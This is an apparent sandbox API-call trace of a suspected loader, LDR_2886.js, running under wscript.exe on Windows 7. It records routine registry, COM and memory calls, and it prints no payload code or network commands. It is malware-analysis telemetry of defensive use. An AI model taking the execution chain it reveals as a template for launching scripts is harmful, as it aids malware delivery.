	[0243.732] VirtualQuery (in: lpAddress=0x29b8a0, lpBuffer=0x29c760, dwLength=0x30 | out: lpBuffer=0x29c760*(BaseAddress=0x29b000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0243.736] VirtualQuery (in: lpAddress=0x29b8a0, lpBuffer=0x29c760, dwLength=0x30 | out: lpBuffer=0x29c760*(BaseAddress=0x29b000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0249.796] VirtualQuery (in: lpAddress=0x29b8a0, lpBuffer=0x29c760, dwLength=0x30 | out: lpBuffer=0x29c760*(BaseAddress=0x29b000, AllocationBase=0x220000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0250.327] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4bdf80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0250.327] CoTaskMemFree (pv=0x4bdf80) 
	[0251.941] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x4be3c0
	[0259.200] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4be5e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0259.200] CoTaskMemFree (pv=0x4be5e0) 
	[0259.214] CoTaskMemAlloc (cb=0x104) returned 0x4be5e0
	[0259.214] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4be5e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0259.215] CoTaskMemFree (pv=0x4be5e0) 
	[0259.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74

Thread:
	id = 99
	os_tid = 0x9dc


Thread:
	id = 100
	os_tid = 0x708


Thread:
	id = 101
	os_tid = 0x9e8


Thread:
	id = 106
	os_tid = 0x24c


Thread:
	id = 108
	os_tid = 0x76c

	[0061.555] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0149.541] RegCloseKey (hKey=0x330) returned 0x0
	[0149.541] LocalFree (hMem=0x4338f0) returned 0x0
	[0149.541] CloseHandle (hObject=0x1d0) returned 1
	[0149.542] CloseHandle (hObject=0x13) returned 1
	[0149.542] CloseHandle (hObject=0xf) returned 1
	[0149.542] RegCloseKey (hKey=0x310) returned 0x0
	[0149.543] RegCloseKey (hKey=0x30c) returned 0x0
	[0149.543] RegCloseKey (hKey=0x308) returned 0x0
	[0149.543] LocalFree (hMem=0x4338c0) returned 0x0
	[0165.977] RegCloseKey (hKey=0x324) returned 0x0
	[0203.557] RegCloseKey (hKey=0x37c) returned 0x0
	[0203.558] RegCloseKey (hKey=0x378) returned 0x0
	[0203.558] RegCloseKey (hKey=0x374) returned 0x0
	[0203.558] RegCloseKey (hKey=0x370) returned 0x0
	[0203.558] RegCloseKey (hKey=0x36c) returned 0x0
	[0203.558] RegCloseKey (hKey=0x368) returned 0x0
	[0203.559] RegCloseKey (hKey=0x344) returned 0x0
	[0203.559] RegCloseKey (hKey=0x394) returned 0x0
	[0203.559] RegCloseKey (hKey=0x360) returned 0x0
	[0203.559] RegCloseKey (hKey=0x35c) returned 0x0
	[0203.559] RegCloseKey (hKey=0x358) returned 0x0
	[0203.560] RegCloseKey (hKey=0x354) returned 0x0
	[0203.560] RegCloseKey (hKey=0x350) returned 0x0
	[0203.560] RegCloseKey (hKey=0x34c) returned 0x0
	[0203.560] RegCloseKey (hKey=0x348) returned 0x0
	[0203.560] RegCloseKey (hKey=0x390) returned 0x0
	[0203.561] RegCloseKey (hKey=0x38c) returned 0x0
	[0203.561] RegCloseKey (hKey=0x338) returned 0x0
	[0203.561] RegCloseKey (hKey=0x334) returned 0x0
	[0203.561] RegCloseKey (hKey=0x330) returned 0x0
	[0203.561] RegCloseKey (hKey=0x1d0) returned 0x0
	[0203.562] RegCloseKey (hKey=0x310) returned 0x0
	[0203.562] RegCloseKey (hKey=0x30c) returned 0x0
	[0203.562] RegCloseKey (hKey=0x308) returned 0x0
	[0203.562] RegCloseKey (hKey=0x1cc) returned 0x0
	[0203.562] RegCloseKey (hKey=0x1c8) returned 0x0
	[0203.563] RegCloseKey (hKey=0x388) returned 0x0
	[0203.563] RegCloseKey (hKey=0x384) returned 0x0
	[0203.563] RegCloseKey (hKey=0x364) returned 0x0
	[0203.563] RegCloseKey (hKey=0x398) returned 0x0

Thread:
	id = 211
	os_tid = 0x484


Process:
	id = "12"
	image_name = "wscript.exe"
	filename = "c:\\windows\\system32\\wscript.exe"
	page_root = "0x5ca63000"
	os_pid = "0x178"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x910"
	cmd_line = "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" "
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 111
	os_tid = 0xa1c

	[0057.923] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf7d0 | out: lpSystemTimeAsFileTime=0x2cf7d0*(dwLowDateTime=0x9b0a3160, dwHighDateTime=0x1d543d1)) 
	[0057.923] GetCurrentProcessId () returned 0x178
	[0057.923] GetCurrentThreadId () returned 0xa1c
	[0057.923] GetTickCount () returned 0x1f546
	[0057.923] QueryPerformanceCounter (in: lpPerformanceCount=0x2cf7d8 | out: lpPerformanceCount=0x2cf7d8*=18234896961) returned 1
	[0057.923] GetStartupInfoA (in: lpStartupInfo=0x2cf7f0 | out: lpStartupInfo=0x2cf7f0*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\WScript.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffffffffffff, hStdOutput=0xffffffffffffffff, hStdError=0xffffffffffffffff)) 
	[0057.923] GetModuleHandleA (lpModuleName=0x0) returned 0xff430000
	[0057.923] GetModuleHandleA (lpModuleName=0x0) returned 0xff430000
	[0057.923] GetVersionExA (in: lpVersionInformation=0x2cf710*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x3f1eb0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2cf710*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0057.923] GetUserDefaultLCID () returned 0x409
	[0057.924] CoInitialize (pvReserved=0x0) returned 0x0
	[0057.936] GetCommandLineW () returned="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" "
	[0057.936] lstrlenW (lpString="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" ") returned 85
	[0057.936] ??2@YAPEAX_K@Z () returned 0x6657b0
	[0057.936] ??2@YAPEAX_K@Z () returned 0x665f60
	[0057.936] GetCurrentThreadId () returned 0xa1c
	[0057.936] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf458 | out: phkResult=0x2cf458*=0x7c) returned 0x0
	[0057.937] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf450 | out: phkResult=0x2cf450*=0x80) returned 0x0
	[0057.937] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x2ce758, lpData=0x2ceb60, lpcbData=0x2ce750*=0x400 | out: lpType=0x2ce758*=0x0, lpData=0x2ceb60*=0x67, lpcbData=0x2ce750*=0x400) returned 0x2
	[0057.937] RegQueryValueExW (in: hKey=0x7c, lpValueName="Enabled", lpReserved=0x0, lpType=0x2ce758, lpData=0x2ceb60, lpcbData=0x2ce750*=0x400 | out: lpType=0x2ce758*=0x0, lpData=0x2ceb60*=0x67, lpcbData=0x2ce750*=0x400) returned 0x2
	[0057.937] RegQueryValueExW (in: hKey=0x80, lpValueName="Enabled", lpReserved=0x0, lpType=0x2ce758, lpData=0x2ceb60, lpcbData=0x2ce750*=0x400 | out: lpType=0x2ce758*=0x0, lpData=0x2ceb60*=0x67, lpcbData=0x2ce750*=0x400) returned 0x2
	[0057.937] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
	[0058.290] RegCloseKey (hKey=0x80) returned 0x0
	[0058.290] RegCloseKey (hKey=0x7c) returned 0x0
	[0058.291] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf170 | out: phkResult=0x2cf170*=0x7c) returned 0x0
	[0058.291] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf168 | out: phkResult=0x2cf168*=0x80) returned 0x0
	[0058.291] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x2ce478, lpData=0x2ce880, lpcbData=0x2ce470*=0x400 | out: lpType=0x2ce478*=0x0, lpData=0x2ce880*=0x0, lpcbData=0x2ce470*=0x400) returned 0x2
	[0058.291] RegQueryValueExW (in: hKey=0x7c, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x2ce478, lpData=0x2ce880, lpcbData=0x2ce470*=0x400 | out: lpType=0x2ce478*=0x0, lpData=0x2ce880*=0x0, lpcbData=0x2ce470*=0x400) returned 0x2
	[0058.291] RegQueryValueExW (in: hKey=0x80, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x2ce478, lpData=0x2ce880, lpcbData=0x2ce470*=0x400 | out: lpType=0x2ce478*=0x0, lpData=0x2ce880*=0x0, lpcbData=0x2ce470*=0x400) returned 0x2
	[0058.291] RegCloseKey (hKey=0x80) returned 0x0
	[0058.291] RegCloseKey (hKey=0x7c) returned 0x0
	[0058.291] GetACP () returned 0x4e4
	[0058.291] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77040000
	[0058.291] GetProcAddress (hModule=0x77040000, lpProcName="HeapSetInformation") returned 0x7705c4a0
	[0058.291] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0058.291] FreeLibrary (hLibModule=0x77040000) returned 1
	[0058.291] ??2@YAPEAX_K@Z () returned 0x665f80
	[0058.292] CoRegisterMessageFilter (in: lpMessageFilter=0x665f80, lplpMessageFilter=0x665f90 | out: lplpMessageFilter=0x665f90*=0x0) returned 0x0
	[0058.292] GetModuleFileNameW (in: hModule=0xff430000, lpFilename=0x2cf4b0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0058.292] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", lpdwHandle=0x2cee00 | out: lpdwHandle=0x2cee00) returned 0x704
	[0058.293] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x2ce6f0 | out: lpData=0x2ce6f0) returned 1
	[0058.293] VerQueryValueW (in: pBlock=0x2ce6f0, lpSubBlock="\\", lplpBuffer=0x2cee08, puLen=0x2cee04 | out: lplpBuffer=0x2cee08*=0x2ce718, puLen=0x2cee04) returned 1
	[0058.293] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cee58 | out: phkResult=0x2cee58*=0x7c) returned 0x0
	[0058.293] RegQueryValueExW (in: hKey=0x7c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x2ce1a8, lpData=0x2ce5b0, lpcbData=0x2ce1a0*=0x400 | out: lpType=0x2ce1a8*=0x0, lpData=0x2ce5b0*=0x0, lpcbData=0x2ce1a0*=0x400) returned 0x2
	[0058.293] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cee10 | out: phkResult=0x2cee10*=0x80) returned 0x0
	[0058.293] RegQueryValueExW (in: hKey=0x80, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x2cedd4, lpData=0x2cee50, lpcbData=0x2cedd0*=0x4 | out: lpType=0x2cedd4*=0x0, lpData=0x2cee50*=0x80, lpcbData=0x2cedd0*=0x4) returned 0x2
	[0058.293] RegQueryValueExW (in: hKey=0x80, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x2ce1a8, lpData=0x2ce5b0, lpcbData=0x2ce1a0*=0x400 | out: lpType=0x2ce1a8*=0x0, lpData=0x2ce5b0*=0x0, lpcbData=0x2ce1a0*=0x400) returned 0x2
	[0058.293] RegQueryValueExW (in: hKey=0x7c, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x2cedd4, lpData=0x2cee50, lpcbData=0x2cedd0*=0x4 | out: lpType=0x2cedd4*=0x0, lpData=0x2cee50*=0x80, lpcbData=0x2cedd0*=0x4) returned 0x2
	[0058.293] RegQueryValueExW (in: hKey=0x7c, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x2ce1a8, lpData=0x2ce5b0, lpcbData=0x2ce1a0*=0x400 | out: lpType=0x2ce1a8*=0x1, lpData="1", lpcbData=0x2ce1a0*=0x4) returned 0x0
	[0058.294] lstrlenW (lpString="1") returned 1
	[0058.294] lstrlenW (lpString="0") returned 1
	[0058.294] lstrlenW (lpString="1") returned 1
	[0058.294] lstrlenW (lpString="no") returned 2
	[0058.294] lstrlenW (lpString="1") returned 1
	[0058.294] lstrlenW (lpString="false") returned 5
	[0058.294] RegCloseKey (hKey=0x80) returned 0x0
	[0058.294] RegCloseKey (hKey=0x7c) returned 0x0
	[0058.294] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x2cee58, lpdwDisposition=0x0 | out: phkResult=0x2cee58*=0x7c, lpdwDisposition=0x0) returned 0x0
	[0058.294] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x2cedf4, lpData=0x2cee50, lpcbData=0x2cedf0*=0x4 | out: lpType=0x2cedf4*=0x0, lpData=0x2cee50*=0x80, lpcbData=0x2cedf0*=0x4) returned 0x2
	[0058.294] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x2ce1c8, lpData=0x2ce5d0, lpcbData=0x2ce1c0*=0x400 | out: lpType=0x2ce1c8*=0x1, lpData="1", lpcbData=0x2ce1c0*=0x4) returned 0x0
	[0058.294] lstrlenW (lpString="1") returned 1
	[0058.294] lstrlenW (lpString="0") returned 1
	[0058.294] lstrlenW (lpString="1") returned 1
	[0058.294] lstrlenW (lpString="no") returned 2
	[0058.294] lstrlenW (lpString="1") returned 1
	[0058.294] lstrlenW (lpString="false") returned 5
	[0058.294] RegCloseKey (hKey=0x7c) returned 0x0
	[0058.294] RegCreateKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x2cee58, lpdwDisposition=0x0 | out: phkResult=0x2cee58*=0x7c, lpdwDisposition=0x0) returned 0x0
	[0058.294] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x2cedf4, lpData=0x2cee50, lpcbData=0x2cedf0*=0x4 | out: lpType=0x2cedf4*=0x0, lpData=0x2cee50*=0x80, lpcbData=0x2cedf0*=0x4) returned 0x2
	[0058.294] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x2ce1c8, lpData=0x2ce5d0, lpcbData=0x2ce1c0*=0x400 | out: lpType=0x2ce1c8*=0x0, lpData=0x2ce5d0*=0x31, lpcbData=0x2ce1c0*=0x400) returned 0x2
	[0058.294] RegCloseKey (hKey=0x7c) returned 0x0
	[0058.294] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js") returned 48
	[0058.294] lstrlenW (lpString="js") returned 2
	[0058.294] lstrlenW (lpString="WSH") returned 3
	[0058.294] ??2@YAPEAX_K@Z () returned 0x665870
	[0058.295] LoadStringW (in: hInstance=0xff430000, uID=0x9c5, lpBuffer=0x2cd8c0, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13
	[0058.295] LoadTypeLib (in: szFile="C:\\Windows\\System32\\WScript.exe", pptlib=0x2ce900*=0x0 | out: pptlib=0x2ce900*=0x41d100) returned 0x0
	[0058.300] ITypeLib:GetTypeInfoOfGuid (in: This=0x41d100, GUID=0xff4358f0, ppTInfo=0x2ce8e8 | out: ppTInfo=0x2ce8e8*=0x41e4e8) returned 0x0
	[0058.301] ITypeInfo:GetRefTypeOfImplType (in: This=0x41e4e8, index=0xffffffff, pRefType=0x2ce8e0 | out: pRefType=0x2ce8e0*=0xfffffffe) returned 0x0
	[0058.301] ITypeInfo:GetRefTypeInfo (in: This=0x41e4e8, hreftype=0xfffffffe, ppTInfo=0xff44f458 | out: ppTInfo=0xff44f458*=0x41e540) returned 0x0
	[0058.302] IUnknown:Release (This=0x41e4e8) returned 0x1
	[0058.302] ??2@YAPEAX_K@Z () returned 0x665900
	[0058.302] ??2@YAPEAX_K@Z () returned 0x6659a0
	[0058.302] ??2@YAPEAX_K@Z () returned 0x665a00
	[0058.302] ITypeLib:GetTypeInfoOfGuid (in: This=0x41d100, GUID=0xff435950, ppTInfo=0x2ce8e8 | out: ppTInfo=0x2ce8e8*=0x41e598) returned 0x0
	[0058.302] ITypeInfo:GetRefTypeOfImplType (in: This=0x41e598, index=0xffffffff, pRefType=0x2ce8e0 | out: pRefType=0x2ce8e0*=0xfffffffe) returned 0x0
	[0058.302] ITypeInfo:GetRefTypeInfo (in: This=0x41e598, hreftype=0xfffffffe, ppTInfo=0xff44f4d8 | out: ppTInfo=0xff44f4d8*=0x41e5f0) returned 0x0
	[0058.302] IUnknown:Release (This=0x41e598) returned 0x1
	[0058.302] ITypeLib:GetTypeInfoOfGuid (in: This=0x41d100, GUID=0xff435960, ppTInfo=0x2ce8e8 | out: ppTInfo=0x2ce8e8*=0x41e648) returned 0x0
	[0058.302] ITypeInfo:GetRefTypeOfImplType (in: This=0x41e648, index=0xffffffff, pRefType=0x2ce8e0 | out: pRefType=0x2ce8e0*=0xfffffffe) returned 0x0
	[0058.302] ITypeInfo:GetRefTypeInfo (in: This=0x41e648, hreftype=0xfffffffe, ppTInfo=0xff44f518 | out: ppTInfo=0xff44f518*=0x41e6a0) returned 0x0
	[0058.302] IUnknown:Release (This=0x41e648) returned 0x1
	[0058.302] ITypeLib:GetTypeInfoOfGuid (in: This=0x41d100, GUID=0xff435910, ppTInfo=0x2ce8e8 | out: ppTInfo=0x2ce8e8*=0x41e6f8) returned 0x0
	[0058.302] ITypeInfo:GetRefTypeOfImplType (in: This=0x41e6f8, index=0xffffffff, pRefType=0x2ce8e0 | out: pRefType=0x2ce8e0*=0xfffffffe) returned 0x0
	[0058.302] ITypeInfo:GetRefTypeInfo (in: This=0x41e6f8, hreftype=0xfffffffe, ppTInfo=0xff44f498 | out: ppTInfo=0xff44f498*=0x41e750) returned 0x0
	[0058.302] IUnknown:Release (This=0x41e6f8) returned 0x1
	[0058.302] IUnknown:Release (This=0x41d100) returned 0x4
	[0058.303] ??2@YAPEAX_K@Z () returned 0x665a60
	[0058.303] GetCurrentThreadId () returned 0xa1c
	[0058.303] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xcc
	[0058.303] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xff441cf8, lpParameter=0x665a60, dwCreationFlags=0x0, lpThreadId=0x665a88 | out: lpThreadId=0x665a88*=0x57c) returned 0xd4
	[0058.303] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x2ceb40*=0xcc, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0058.344] CloseHandle (hObject=0xcc) returned 1
	[0058.344] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", nBufferLength=0x104, lpBuffer=0x2cebd0, lpFilePart=0x2cebc0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", lpFilePart=0x2cebc0*="LDR_2886.js") returned 0x30
	[0058.344] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey=".js", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce0e0 | out: phkResult=0x2ce0e0*=0xe6) returned 0x0
	[0058.345] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x2ce090, lpData=0x2ce0f0, lpcbData=0x2ce094*=0x800 | out: lpType=0x2ce090*=0x1, lpData="JSFile", lpcbData=0x2ce094*=0xe) returned 0x0
	[0058.345] RegCloseKey (hKey=0xe6) returned 0x0
	[0058.345] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="JSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce0e0 | out: phkResult=0x2ce0e0*=0xe6) returned 0x0
	[0058.345] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x2ce090, lpData=0x2ce960, lpcbData=0x2ce094*=0x200 | out: lpType=0x2ce090*=0x1, lpData="JScript", lpcbData=0x2ce094*=0x10) returned 0x0
	[0058.345] RegCloseKey (hKey=0xe6) returned 0x0
	[0058.345] ??2@YAPEAX_K@Z () returned 0x6663a0
	[0058.345] GetProcessHeap () returned 0x3f0000
	[0058.345] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x2000) returned 0x428430
	[0058.346] CLSIDFromString (in: lpsz="JScript", pclsid=0x2ce8d8 | out: pclsid=0x2ce8d8*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58))) returned 0x0
	[0058.346] CoCreateInstance (rclsid=0x2ce8d8*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xff431800*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2ce8d0) 
	[0058.356] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ccad0 | out: lpSystemTimeAsFileTime=0x2ccad0*(dwLowDateTime=0x9b4cd7e0, dwHighDateTime=0x1d543d1)) 
	[0058.356] GetCurrentProcessId () returned 0x178
	[0058.356] GetCurrentThreadId () returned 0xa1c
	[0058.356] GetTickCount () returned 0x1f6fb
	[0058.356] QueryPerformanceCounter (in: lpPerformanceCount=0x2ccad8 | out: lpPerformanceCount=0x2ccad8*=18278219798) returned 1
	[0058.356] malloc (_Size=0x100) returned 0x666670
	[0058.357] __dllonexit () returned 0x7fee15d0728
	[0058.357] __dllonexit () returned 0x7fee15d0780
	[0058.357] __dllonexit () returned 0x7fee15d0750
	[0058.357] __dllonexit () returned 0x7fee15d07b0
	[0058.357] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefd710000
	[0058.357] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegisterTraceGuidsA") returned 0x7717f570
	[0058.358] EtwRegisterTraceGuidsA () returned 0x0
	[0058.358] EtwRegisterTraceGuidsA () returned 0x0
	[0058.358] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2cc6c0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0058.358] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegOpenKeyExA") returned 0x7fefd72b5f0
	[0058.358] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x2cc828 | out: phkResult=0x2cc828*=0x0) returned 0x2
	[0058.366] IdentifyCodeAuthzLevelW () returned 0x1
	[0058.440] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cdbd0 | out: lpSystemTimeAsFileTime=0x2cdbd0*(dwLowDateTime=0x9b58bec0, dwHighDateTime=0x1d543d1)) 
	[0058.440] GetCurrentProcessId () returned 0x178
	[0058.440] GetCurrentThreadId () returned 0xa1c
	[0058.440] GetTickCount () returned 0x1f749
	[0058.440] QueryPerformanceCounter (in: lpPerformanceCount=0x2cdbd8 | out: lpPerformanceCount=0x2cdbd8*=18286572546) returned 1
	[0058.440] malloc (_Size=0x100) returned 0x667b60
	[0058.440] GetVersionExA (in: lpVersionInformation=0x2cd9b0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xe33af810, dwBuildNumber=0x7fe, dwPlatformId=0xe33a0000, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x2cd9b0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0058.440] GetUserDefaultLCID () returned 0x409
	[0058.440] IsFileSupportedName () returned 0x1
	[0058.440] _wcsicmp (_String1=".vbs", _String2=".js") returned 12
	[0058.440] _wcsicmp (_String1=".vbe", _String2=".js") returned 12
	[0058.440] _wcsicmp (_String1=".js", _String2=".js") returned 0
	[0058.516] GetSignedDataMsg () returned 0x0
	[0058.516] GetCurrentProcess () returned 0xffffffffffffffff
